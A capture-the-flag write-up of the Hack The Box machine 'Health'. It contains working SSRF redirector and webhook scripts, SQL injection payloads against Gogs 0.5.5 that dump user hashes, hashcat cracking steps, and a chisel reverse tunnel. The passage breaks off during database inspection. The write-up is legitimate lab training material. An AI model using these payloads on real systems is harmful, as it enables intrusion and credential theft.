# Health - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img width="560" height="424" src="images/0.png"></div>

Health is a splendid medium-difficulty HTB machine created by [irogir](https://app.hackthebox.com/users/476556)  
I wonder why it was rated poorly; it is easily among my favourites on the platform.

The box starts with a health check service vulnerable to SSRF that lets us read even the response body of requests to filtered ports.  
It has a relatively old version of **Gogs - Go Git Service** running on one such filtered port, vulnerable to SQL injection.  
Exploiting that SQLi is not trivial as it is only accessible via SSRF. To exploit it, we were expected to get a local version of Gogs.  
The SQLi allows us to dump username, salt and hashed password, which can be cracked to get SSH on the box.  
For root, I exploited arbitrary file read with `file_get_contents`, found in the code responsible for health check logic.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.11.176
Nmap scan report for 10.10.11.176
Host is up (0.085s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
3000/tcp filtered ppp
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80,3000 -oN health.nmap 10.10.11.176
Nmap scan report for 10.10.11.176
Host is up (0.085s latency).

PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 32:b7:f4:d4:2f:45:d3:30:ee:12:3b:03:67:bb:e6:31 (RSA)
|   256 86:e1:5d:8c:29:39:ac:d7:e8:15:e6:49:e2:35:ed:0c (ECDSA)
|_  256 ef:6b:ad:64:d5:e4:5b:3e:66:79:49:f4:ec:4c:23:9f (ED25519)
80/tcp   open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HTTP Monitoring Tool
3000/tcp filtered ppp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Besides the usual SSH and HTTP ports, we also have a filtered port: 3000

Visiting the website on port 80:

![1](images/1.png)

Since it has `health.htb` in the footer, I added this line to `/etc/hosts`:

```text
10.10.11.176 health.htb
```

Running `gobuster` in both `vhost` and `dir` modes was fruitless.

## Webhook for health check

The cookies indicate that the website is built with laravel, a PHP web framework.  
This website allows us to check whether an HTTP server is available.  
For that purpose, it lets us configure a webhook that periodically health checks the server and sends relevant data to us.

We can use port 8000 on our tun0 IP for the Payload URL, and for the Monitored URL, we can use anything.  
Since HTB boxes are usually not connected to the internet, it would tell us that they are down regardless.  
For interval, I used `*/1 * * * *` and opted for the option to trigger webhook even when the service is up.  
I don't want it to check the exact address repeatedly, so I prefer the "Test" button over "Create webhook".

Since testing multiple URLs with the website GUI is a chore, I chose to automate that part and wrote [test_webhook.py](test_webhook.py):

```py
import requests
import re

from socket import socket, AF_INET, SOCK_DGRAM, inet_ntoa
from struct import pack
from fcntl import ioctl

url = 'http://health.htb'

proxy = {}
# proxy['http'] = 'http://127.0.0.1:8080'


def grab_cookies_and_token():
    r = requests.get(url, proxies=proxy)
    token_pattern = re.compile(r'name="_token" value="(.+?)">', re.DOTALL)
    matches = token_pattern.search(r.text)
    token = matches.group(1)
    return r.cookies, token


def grab_tun_ip():
    sock = socket(AF_INET, SOCK_DGRAM)
    packed_addr = ioctl(sock.fileno(), 0x8915, pack('256s', b'tun0'))[20:24]
    return inet_ntoa(packed_addr)


def health_check_webhook(tun_ip, token, cookie_jar):
    payload = {'_token': token, 'webhookUrl': f'http://{tun_ip}:8000', 'monitoredUrl': f'http://{tun_ip}',
               'frequency': '*/1 * * * *', 'onlyError': '0', 'action': 'Test'}
    r = requests.post(url + '/webhook', data=payload, cookies=cookie_jar, proxies=proxy)
    return r.text


if __name__ == "__main__":
    tun_ip = grab_tun_ip()
    cookie_jar, token = grab_cookies_and_token()
    resp = health_check_webhook(tun_ip, token, cookie_jar)
    if 'The host is healthy!' in resp:
        print('Host is up!')
```

It would have been better to perform the health check in the same session instead of grabbing the cookie jar.

## Server-Side Request Forgery

After some trial and error, I found that we can start an HTTP server locally on port 80 and have the service health check our tun0 IP.  
I've updated the python code above to have my tun0 IP as the monitored URL.

The responses sent to the Webhook URL also contain the response body. This is a good case of Server-Side Request Forgery (SSRF) where even the response body is accessible.  
'127.0.0.1' and 'localhost' are blacklisted, so we cannot check what's running on that filtered port 3000 we found earlier.  
Trying filter bypass payloads from HackTricks didn't work either.

Ultimately, the redirector trick worked. In this one, we set up a server locally that redirects all requests to another address of our choice.  
I've used it on multiple CTFs, including the retired box Forge. I created a little [redirector.py](redirector.py) script.

```py
from http.server import HTTPServer, BaseHTTPRequestHandler
from argparse import ArgumentParser


def redirect(local_port, redirect_url):

    class RedirectHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(302)
            self.send_header('Location', redirect_url)
            self.end_headers()

    httpd = HTTPServer(('', local_port), RedirectHandler)

    return httpd


if __name__ == '__main__':
    parser = ArgumentParser(add_help=True,
                            description='Bypass SSRF filters by setting up a server that redirects requests')
    parser.add_argument('-p', action='store', default=80, metavar='PORT', type=int,
                        help='Local port to listen for incoming requests')
    parser.add_argument('-u', action='store', required=True, metavar='URL',
                        help='Target URL to redirect all requests to')

    options = parser.parse_args()

    httpd = redirect(options.p, options.u)
    httpd.serve_forever()
```

Next, I had to start another listener on port 8000 locally to catch the webhook's response body.  
For that purpose, I wrote another python script, [webhook_handler.py](webhook_handler.py):

```py
from http.server import BaseHTTPRequestHandler, HTTPServer
from json import loads


def get_page(port):

    class WebhookHandler(BaseHTTPRequestHandler):
        def do_POST(self):
            content_length = int(self.headers['Content-Length'])
            post_data = self.rfile.read(content_length)
            post_data = loads(post_data.decode('utf-8'))
            contents = post_data['body']
            print(f'\u001b[31mRequest body:\u001b[0m\n\n{contents}')

    httpd = HTTPServer(('', port), WebhookHandler)

    return httpd


if __name__ == '__main__':
    httpd = get_page(8000)
    print('\u001b[32m[-] Listening...\u001b[0m')

    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
```

On to exploitation now.  
First, start the redirector with:

```console
opcode@parrot$ sudo python3 redirector.py -u http://127.0.0.1:3000
```

Then, the webhook handler in another terminal:

```console
opcode@parrot$ python3 webhook_handler.py
```

And finally, run the script to make a request to <http://health.htb>:

```console
opcode@parrot$ python3 test_webhook.py
Host is up!
```

In the terminal running `webhook_handler.py`, I successfully got the response from <http://127.0.0.1:3000>:

```html
[-] Listening...
Request body:

<!DOCTYPE html>
<html>
    <head data-suburl="">
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
        <meta name="author" content="Gogs - Go Git Service" />
        <meta name="description" content="Gogs(Go Git Service) a painless self-hosted Git Service written in Go" />
        <meta name="keywords" content="go, git, self-hosted, gogs">
        <meta name="_csrf" content="kCChsvh0pZxiu8vnYBJIIxVa9Mc6MTY3MzM1OTM1MDUyNzY2NzcxMQ==" />
        
[--SNIP--]

        <title>Gogs: Go Git Service</title>
    </head>
    <body>
        <div id="wrapper">
        <noscript>Please enable JavaScript in your browser!</noscript>

[--SNIP--]

        </div>
        <footer id="footer">
            <div class="container clear">
                <p class="left" id="footer-rights">© 2014 GoGits · Version: 0.5.5.1010 Beta · Page: <strong>1ms</strong> ·
                    Template: <strong>1ms</strong></p>

[--SNIP--]
```

I've removed most of the HTML and only kept the relevant part here.  
The service running on port 3000 is Gogs - Go Git Service. The footer even tells us that the version is 0.5.5.1010 Beta  

This is a terribly old version with way too many CVEs.  
But most of them are irrelevant, as I can only make GET requests. Hell, even testing for trivial credentials is not possible.  
This restriction narrows down the exploit to CVE-2014-8682, a SQL injection exploit.  
All the details relevant to this exploit can be found here: <https://www.exploit-db.com/exploits/35238>

There are two payloads, and none of those worked for me.  

## Gogs local instance

Since my current way of interacting with Gogs service is very rigid and restricted, I decided to get a local instance of Gogs 0.5.5.1010 Beta  
I could not find the exact version, but [v0.5.5](https://github.com/gogs/gogs/releases/tag/v0.5.5) should be fine.

Usually, I prefer a docker install as they are the easiest to get up quickly. In the source, there is a docker directory with `Dockerfiles` for several different scenarios.  
But it builds `gogs` from the source, which quickly became a nightmare. The version of `golang` is so old that the command `go get` had an entirely different purpose. Similarly, the version of `docker-compose` being used is prehistoric, called `fig` (<https://github.com/aanand/fig>).  
The error messages quickly became esoteric and I gave up.

I decided to use the pre-built binaries.  
Now comes the question of which database is being used. Using the SSRF, I tried to health check ports 3306 (`mysql`), 5432 (`postgresql`) and 6379 (`redis`) but got `"health":"down"` on all of them.  
It may indicate that the database is `SQLite`. It's still uncertain because databases might not respond to HTTP GET requests.  
I assumed it was `mysql` because it is one such database.

I created a [Dockerfile](gogs_vuln/Dockerfile):

```docker
FROM debian:bullseye-slim

RUN set -ex; \
    apt-get update; \
    apt-get install -y --no-install-recommends \
    curl \
    ca-certificates \
    unzip \
    git \
    gnupg \
    dirmngr; \
    apt-get autoremove -y --purge; \
    apt-get clean; \
    rm -rf /var/lib/apt/lists/*

RUN set -ex; \
    gpg --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 467B942D3A79BD29; \
    gpg --export 467B942D3A79BD29 > /etc/apt/trusted.gpg.d/mysql.gpg; \
    gpgconf --kill all; \
    echo 'deb http://repo.mysql.com/apt/debian/ bullseye mysql-8.0' > /etc/apt/sources.list.d/mysql.list; \
    apt-get update; \
    apt-get install -y --no-install-recommends \
    mysql-client; \
    apt-get autoremove -y --purge; \
    apt-get clean; \
    rm -rf /var/lib/apt/lists/*

RUN adduser --system --group --disabled-password --shell /bin/bash --home /home/git --gecos '' git

WORKDIR /home/git

RUN set -ex; \
    curl -L https://github.com/gogs/gogs/releases/download/v0.5.5/linux_amd64.zip -o linux_amd64.zip; \
    unzip linux_amd64.zip; \
    rm linux_amd64.zip

COPY --chown=git:git wait-for-mysql.sh gogs/

COPY --chown=git:git app.ini gogs/custom/conf/app.ini

RUN set -ex; \
    chown -R git:git gogs/; \
    chmod -R a+rwx,g-wx,o-wx gogs/

USER git

WORKDIR /home/git/gogs

ENTRYPOINT ["./wait-for-mysql.sh", "db", "scripts/start.sh"]
```

I also created a [docker-compose.yml](gogs_vuln/docker-compose.yml):

```yaml
services:
    app:
      build: .
      links:
        - db
      ports:
        - '3000:3000'
    db:
      image: mysql:latest
      entrypoint: ['docker-entrypoint.sh', '--default-authentication-plugin=mysql_native_password']
      environment:
        MYSQL_ROOT_PASSWORD: opcode
        MYSQL_DATABASE: gogs
        MYSQL_USER: gogs
        MYSQL_PASSWORD: opcode
      ports:
        - '3306:3306'
```

It was a pain to get it to work, actually.  
I had to use `--default-authentication-plugin=mysql_native_password` argument in the `entrypoint` for `mysql` container to avoid this error:  
<https://stackoverflow.com/questions/50093144/mysql-8-0-client-does-not-support-authentication-protocol-requested-by-server>

The next issue was installing `mysql-client` on Debian. Importing the signing key and creating the repository configuration was not straightforward because the instructions at <https://dev.mysql.com/doc/mysql-apt-repo-quick-guide/en/> are interactive, and we cannot have that in a `Dockerfile`.

Another issue was with `gogs` not identifying my user as the current user.  
It uses the environment variable `USER` for verification, which is not set by default in `debian-slim` docker containers.

I also had to ensure that `gogs` binary is NOT run from outside the `gogs` directory as it uses paths relative to the current working directory.

And finally, there was this issue with `gogs` running before the MySQL server was functional. I got around this issue by creating a [wait-for-mysql.sh](gogs_vuln/wait-for-mysql.sh) script, inspired from <https://web.archive.org/web/20221222005531/https://docs.docker.com/compose/startup-order/>  

```bash
#!/bin/sh

set -e

host="$1"
# Shift arguments for `exec "$@"` below to work correctly
shift

until mysql -h "$host" --user=gogs --password=opcode -e 'exit'; do
  >&2 echo "Database is unavailable - sleeping"
  sleep 2
done

>&2 echo "Database is up - executing command"

exec "$@"
```

On a side note, I'm using a wayback machine URL because they changed the page in 2023. The current recommended way to manage startup orders is to use the `condition` attribute.

As for the `gogs` configuration, I used the default [app.ini](gogs_vuln/app.ini), with these modifications:

```ini
RUN_MODE = prod

[repository]
ROOT = /home/git/gogs-repositories
SCRIPT_TYPE = bash

[database]
DB_TYPE = mysql
HOST = db:3306
NAME = gogs
USER = gogs
PASSWD = opcode

[security]
INSTALL_LOCK = true
```

We can start these containers now with this command:

```console
opcode@parrot$ docker compose up
```

I visited <http://127.0.0.1:3000/> in my browser and created an account `opcode`.  
Then I logged in and created a repository `arctic`

### SQL injection

Since it is a local instance and I knew the credentials, I connected with `mysql` to look for relevant tables in the database.

```console
opcode@parrot$ mysql -h 172.17.0.1 --user=gogs --password=opcode
```

```console
mysql> use gogs;
Database changed
mysql> show tables;
+----------------+
| Tables_in_gogs |
+----------------+
| access         |
| action         |
| attachment     |
| comment        |
| follow         |
| hook_task      |
| issue          |
| issue_user     |
| label          |
| login_source   |
| milestone      |
| mirror         |
| notice         |
| oauth2         |
| org_user       |
| public_key     |
| release        |
| repository     |
| star           |
| team           |
| team_user      |
| update_task    |
| user           |
| watch          |
| webhook        |
+----------------+
```

The most compelling tables are `repository` and `user`.  
The repository table:

```console
mysql> select * from repository\G
*************************** 1. row ***************************
                   id: 1
             owner_id: 1
              fork_id: 0
           lower_name: arctic
                 name: arctic
          description: arctic
              website: 
          num_watches: 1
            num_stars: 0
            num_forks: 0
           num_issues: 0
    num_closed_issues: 0
            num_pulls: 0
     num_closed_pulls: 0
       num_milestones: 0
num_closed_milestones: 0
           is_private: 0
            is_mirror: 0
              is_fork: 0
              is_bare: 0
             is_goget: 0
       default_branch: 
              created: 2022-10-06 13:36:45
              updated: 2022-10-06 13:36:45
```

The `user` table:

```console
mysql> select * from user\G
*************************** 1. row ***************************
            id: 1
    lower_name: opcode
          name: opcode
     full_name: 
         email: opcode@opcode.com
        passwd: 98e51124de3cae697786e1a8efd4b54cc11cc77c64c965d4b7e48e6591eacef904ed52ba2ba081dc5355e31788850616a1d8
    login_type: 0
  login_source: 0
    login_name: 
          type: 0
 num_followers: 0
num_followings: 0
     num_stars: 0
     num_repos: 1
        avatar: ac5a4cc4430ce3aec72a43fdf44f9c6e
  avatar_email: opcode@opcode.com
      location: 
       website: 
     is_active: 1
      is_admin: 1
         rands: olpERWOtD1
          salt: NBGcplLh8r
       created: 2022-10-06 13:35:08
       updated: 2022-10-06 13:35:08
   description: 
     num_teams: 0
   num_members: 0
```

In the local instance, I got the second payload from <https://www.exploit-db.com/exploits/35238> to work.

```console
opcode@parrot$ curl "http://127.0.0.1:3000/api/v1/users/search?q=%27/**/and/**/false)/**/union/**/select/**/null,null,concat(owner_id,%22:%22,name,%22:%22,description),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/gogs.repository/**/where/**/(%27%25%27%3D%27" --silent | jq .
{
  "data": [
    {
      "username": "1:arctic:arctic",
      "avatar": "//1.gravatar.com/avatar/"
    }
  ],
  "ok": true
}
```

```console
opcode@parrot$ curl "http://127.0.0.1:3000/api/v1/users/search?q=%27/**/and/**/false)/**/union/**/select/**/null,null,concat(name,%22:%22,passwd,%22:%22,rands,%22:%22,salt),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/gogs.user/**/where/**/(%27%25%27%3D%27" --silent | jq .
{
  "data": [
    {
      "username": "opcode:98e51124de3cae697786e1a8efd4b54cc11cc77c64c965d4b7e48e6591eacef904ed52ba2ba081dc5355e31788850616a1d8:olpERWOtD1:NBGcplLh8r",
      "avatar": "//1.gravatar.com/avatar/"
    }
  ],
  "ok": true
}
```

I tried to use it on the box next.

First, the redirector:

```console
opcode@parrot$ sudo python3 redirector.py -u "http://127.0.0.1:3000/api/v1/users/search?q=%27/**/and/**/false)/**/union/**/select/**/null,null,concat(name,%22:%22,passwd,%22:%22,rands,%22:%22,salt),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/gogs.user/**/where/**/(%27%25%27%3D%27"
```

Then, the webhook handler:

```console
opcode@parrot$ python3 webhook_handler.py
```

And finally, a request to <http://health.htb>:

```console
opcode@parrot$ python3 test_webhook.py
```

It didn't work, sadly.  
I tried countermeasures for everything I could think of (escaping quotes, URL encoding, simplifying the payload etc.) but still got nothing.

At this point, I got frustrated and got a hint that the vulnerability was indeed SQL injection in `gogs`.  
When initially doing the box, I had not scripted the `webhook_handler.py` so far and was only using the `redirector.py` and `test_webhook.py`.  
After getting the hint, I improved `test_webhook.py` and created `webhook_handler.py`

### SQL injection payload for SQLite

Since I was unable to verify the ports 3306 (`mysql`), 5432 (`postgresql`) and 6379 (`redis`) with SSRF, I decided to test for SQLite next.

For this one, I created a simpler [docker-compose.yml](gogs_vuln_sqlite/docker-compose.yml):

```yaml
services:
    app:
      build: .
      ports:
        - '3000:3000'
```

And a simpler [Dockerfile](gogs_vuln_sqlite/Dockerfile):

```docker
FROM debian:bullseye-slim

RUN set -ex; \
    apt-get update; \
    apt-get install -y --no-install-recommends \
    curl \
    ca-certificates \
    unzip \
    git; \
    apt-get autoremove -y --purge; \
    apt-get clean; \
    rm -rf /var/lib/apt/lists/*

RUN adduser --system --group --disabled-password --shell /bin/bash --home /home/git --gecos '' git

WORKDIR /home/git

RUN set -ex; \
    curl -L https://github.com/gogs/gogs/releases/download/v0.5.5/linux_amd64.zip -o linux_amd64.zip; \
    unzip linux_amd64.zip; \
    rm linux_amd64.zip

COPY --chown=git:git app.ini gogs/custom/conf/app.ini

RUN set -ex; \
    chown -R git:git gogs/; \
    chmod -R a+rwx,g-wx,o-wx gogs/

USER git

WORKDIR /home/git/gogs

ENTRYPOINT ["scripts/start.sh"]
```

I also modified this line in [app.ini](gogs_vuln_sqlite/app.ini):

```ini
[database]
; Either "mysql", "postgres" or "sqlite3", it's your choice
DB_TYPE = sqlite3
HOST = 
NAME = gogs
USER = gogs
PASSWD = 
; For "postgres" only, either "disable", "require" or "verify-full"
SSL_MODE = disable
; For "sqlite3" only
PATH = data/gogs.db
```

With all the modifications done, the container can be started:

```console
opcode@parrot$ docker compose up
```

Now the issue is to find an equivalent SQLi payload compatible with SQLite.  
I used `sqlmap` for that. Thanks to the payload for `mysql`, it is apparent that the technique is union injection, and all spaces have been replaced with comments.

Hence, I used the `space2comment` tamper script and `--technique=U`:

```console
opcode@parrot$ sqlmap -u 'http://127.0.0.1:3000/api/v1/users/search?q=1' --tamper=space2comment --dbms=sqlite --technique=U --batch
```

It immediately finds the injection:

```console
sqlmap identified the following injection point(s) with a total of 26 HTTP(s) requests:
---
Parameter: q (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 27 columns
    Payload: q=1') UNION ALL SELECT NULL,NULL,CHAR(113,122,106,112,113)||CHAR(116,105,97,118,68,71,66,120,76,114,108,89,106,110,84,77,108,108,110,67,83,121,110,67,74,111,82,84,118,85,99,119,75,81,108,110,102,90,87,90)||CHAR(113,120,107,118,113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- kaqW
---
```

Changes made by the tamper script are not reflected in this payload.

To get the entire thing, I started `burp` and ran:

```console
opcode@parrot$ sqlmap -u 'http://127.0.0.1:3000/api/v1/users/search?q=1' --tamper=space2comment --dbms=sqlite --technique=U -D gogs -T user --dump --proxy http://127.0.0.1:8080 --batch
```

In burpsuite, I was able to spot the relevant request:

![2](images/2.png)

URL decoded, it is:

```text
/api/v1/users/search?q=1')/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113,122,106,112,113)||COALESCE(CAST(name/**/AS/**/TEXT),CHAR(32))||CHAR(113,120,107,118,113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/`user`--/**/ZOzl
```

After some trial and error, I was able to minimize it to:

```text
http://127.0.0.1:3000/api/v1/users/search?q=1')/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,name||":"||passwd||":"||rands||":"||salt,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/user--
```

We can locally verify that it works:

```console
opcode@parrot$ curl 'http://127.0.0.1:3000/api/v1/users/search?q=1%27)/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,owner_id||%22:%22||name||%22:%22||description,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/repository--' --silent | jq .
{
  "data": [
    {
      "username": "",
      "avatar": "//1.gravatar.com/avatar/1:arctic:arctic"
    }
  ],
  "ok": true
}
```

```console
opcode@parrot$ curl 'http://127.0.0.1:3000/api/v1/users/search?q=1%27)/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,name||%22:%22||passwd||%22:%22||rands||%22:%22||salt,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/user--' --silent | jq .
{
  "data": [
    {
      "username": "",
      "avatar": "//1.gravatar.com/avatar/opcode:c0549cadf80aa8cfa731fd1464cb3791b832eed6ae4eb4891f3ee3c2143ec6fa4d69f4238bf0a68e0f9148840ffaa036fee0:P0zsERX28H:2H7ULL3Pn1"
    }
  ],
  "ok": true
}
```

I tried it on the remote next.  
First, the redirector:

```console
opcode@parrot$ sudo python3 redirector.py -u 'http://127.0.0.1:3000/api/v1/users/search?q=1%27)/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,owner_id||%22:%22||name||%22:%22||description,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/repository--'
```

Then, the webhook handler:

```console
opcode@parrot$ python3 webhook_handler.py
```

And finally, a request to <http://health.htb>:

```console
opcode@parrot$ python3 test_webhook.py
```

This one didn't work. I got:

```text
[-] Listening...
Request body:

{"data":[],"ok":true}
```

Next, I tried to change the redirection URL to grab user data instead of repository data:

```console
opcode@parrot$ sudo python3 redirector.py -u 'http://127.0.0.1:3000/api/v1/users/search?q=1%27)/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,name||%22:%22||passwd||%22:%22||rands||%22:%22||salt,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/user--'
```

Oddly, it worked. I got:

```text
[-] Listening...
Request body:

{"data":[{"username":"","avatar":"//1.gravatar.com/avatar/susanne:66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37:m7483YfL9K:sO3XIbeW14"}],"ok":true}
```

Username is `susanne`  
Password hash is `66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37`  
`rands` is `m7483YfL9K` and `salt` is `sO3XIbeW14`

## Cracking the password hash

Googling "crack gogs password" brought me to <https://github.com/kxcode/KrackerGo>  
They are even kind enough to point me to this issue <https://github.com/hashcat/hashcat/issues/1583>

I tried to get `john` to do the job, but it never worked.

Following the instructions on the issue, I unhexed and base64 encoded the hash. Since salt was not a hex string, I simply base64 encoded it:

```console
opcode@parrot$ python3 -c "print(__import__('base64').b64encode(bytes.fromhex('66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37')).decode())"
ZsB0ZFVFeB8QZPt/0Rd0U9uPDKLOWKnYHAS+Lm07oqDWwDLw/U74P0jXQ0nsGW9O/jc=
opcode@parrot$ echo -n 'sO3XIbeW14' | base64
c08zWEliZVcxNA==
```

The final hash becomes:

```text
sha256:10000:c08zWEliZVcxNA==:ZsB0ZFVFeB8QZPt/0Rd0U9uPDKLOWKnYHAS+Lm07oqDWwDLw/U74P0jXQ0nsGW9O/jc=
```

I later learnt that it was also possible to figure it out by going through the source code from (<https://github.com/gogs/gogs/archive/refs/tags/v0.5.5.zip>)  
Inside the file `models/user.go`, there is a function `EncodePasswd()`:

```go
func (u *User) EncodePasswd() {
        newPasswd := base.PBKDF2([]byte(u.Passwd), []byte(u.Salt), 10000, 50, sha256.New)
        u.Passwd = fmt.Sprintf("%x", newPasswd)
}
```

That aside, I then used `hashcat` to crack it:

```console
opcode@parrot$ ./hashcat.bin -m 10900 /home/opcode/hash /usr/share/wordlists/rockyou.txt
```

It cracked to `february15`

`susanne:february15` works for SSH:

```console
opcode@parrot$ sshpass -p 'february15' ssh -o StrictHostKeyChecking=no susanne@health.htb
```

## Port forwarding with chisel

Next, I uploaded the `chisel` binary (<https://github.com/jpillora/chisel>) to the box and used it to access the `gogs` service on my local system.  
On my VM, I ran:

```console
opcode@parrot$ ./chisel server -p 9999 --socks5 --reverse -v
```

And on the box,

```console
susanne@health:~$ ./chisel client 10.10.14.9:9999 R:socks
```

Since the server is running with `-v`, I saw `proxy#R:127.0.0.1:1080=>socks: Listening` once a connection was made.  
Next, I edited `/etc/proxychains.conf` and added this line:

```text
socks5 127.0.0.1 1080
```

Then I started firefox with:

```console
opcode@parrot$ proxychains firefox http://127.0.0.1:3000
```

I logged in using the credentials:

```text
susanne:february15
```

I hoped to see some repositories, but there were none:

![3](images/3.png)

It explains why my SQLi payload to get repository data failed.

## MySQL password in environment variable

I ran `linpeas.sh` on the box and made a tempting discovery:

```console
susanne@health:~$ cat /var/www/html/.env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:x12LE6h+TU6x4gNKZIyBOmthalsPLPLv/Bf/MJfGbzY=
APP_DEBUG=true
APP_URL=http://localhost

LOG_CHANNEL=stack
LOG_DEPRECATIONS_CHANNEL=null
LOG_LEVEL=debug

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=laravel
DB_USERNAME=laravel
DB_PASSWORD=MYsql_strongestpass@2014+

[--SNIP--]
```

We have the database credentials for the database used by the health check service.

```console
susanne@health:~$ cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
susanne:x:1000:1000:susanne:/home/susanne:/bin/bash
gogs:x:1001:1001::/home/gogs:/bin/bash
```

Even though it was unlikely, I tested for password reuse on both accounts, but nothing worked.

## Cron job and laravel scheduler

For the next step, I uploaded `pspy` (<https://github.com/DominicBreuker/pspy>) to the box to monitor cron jobs.  
I found these running every minute:

```text
2022/10/06 20:34:01 CMD: UID=0    PID=51324  | /usr/sbin/CRON -f 
2022/10/06 20:34:01 CMD: UID=0    PID=51327  | sleep 5 
2022/10/06 20:34:01 CMD: UID=0    PID=51328  | /bin/bash -c cd /var/www/html && php artisan schedule:run >> /dev/null 2>&1 
2022/10/06 20:34:01 CMD: UID=0    PID=51329  | php artisan schedule:run 
2022/10/06 20:34:01 CMD: UID=0    PID=51332  | grep columns 
2022/10/06 20:34:01 CMD: UID=0    PID=51331  | stty -a 
2022/10/06 20:34:01 CMD: UID=0    PID=51330  | sh -c stty -a | grep columns 
2022/10/06 20:34:01 CMD: UID=0    PID=51335  | grep columns 
2022/10/06 20:34:01 CMD: UID=0    PID=51334  | stty -a 
2022/10/06 20:34:01 CMD: UID=0    PID=51333  | sh -c stty -a | grep columns 
2022/10/06 20:34:06 CMD: UID=0    PID=51339  | mysql laravel --execute TRUNCATE tasks 
```

This `php artisan schedule:run` implies Laravel scheduler is at work.  
It allows us to manage scheduled tasks, similar to cron jobs.  
The task schedule is defined in the `app/Console/Kernel.php` file's `schedule` method:

```console
susanne@health:/var/www/html$ cat app/Console/Kernel.php 
```

I got:

```php
<?php

namespace App\Console;

use App\Http\Controllers\HealthChecker;
use App\Models\Task;
use Illuminate\Console\Scheduling\Schedule;
use Illuminate\Foundation\Console\Kernel as ConsoleKernel;
use Illuminate\Support\Facades\Log;

class Kernel extends ConsoleKernel
{

    protected function schedule(Schedule $schedule)
    {

        /* Get all tasks from the database */
        $tasks = Task::all();

        foreach ($tasks as $task) {

            $frequency = $task->frequency;

            $schedule->call(function () use ($task) {
                /*  Run your task here */
                HealthChecker::check($task->webhookUrl, $task->monitoredUrl, $task->onlyError);
                Log::info($task->id . ' ' . \Carbon\Carbon::now());
            })->cron($frequency);
        }
    }

    /**
     * Register the commands for the application.
     *
     * @return void
     */
    protected function commands()
    {
        $this->load(__DIR__ . '/Commands');

        require base_path('routes/console.php');
    }
}
```

I guessed that it is the one responsible for health check webhooks.  
This code explains how the "Create Webhook" on the health check service worked.

Every POST request we make on the <http://health.htb/> page gets stored in the MySQL database as tasks.  
Then this scheduler makes requests at the appropriate time according to the tasks in the database.

Aside from this laravel scheduler, the cron job also executes `grep columns` command twice and then runs `mysql laravel --execute TRUNCATE tasks`.  
This must be for cleanup as it runs 5 seconds after the laravel scheduler and deletes all data from `tasks` table.

## Inspecting MySQL databases

Since I have already found the credentials for MySQL, I can take a look:

```console
susanne@health:~$ mysql --user=laravel --password=MYsql_strongestpass@2014+ --database=laravel
```

```console
mysql> show tables;
+------------------------+
| Tables_in_laravel      |
+------------------------+
| failed_jobs            |
| migrations             |
| password_resets        |
| personal_access_tokens |
| tasks                  |
| users                  |
+------------------------+
```

All tables other than `migrations` were empty.  
But I was interested in the `task` table.

```console
mysql> describe tasks;
+--------------+--------------+------+-----+---------+-------+
| Field        | Type         | Null | Key | Default | Extra |
+--------------+--------------+------+-----+---------+-------+
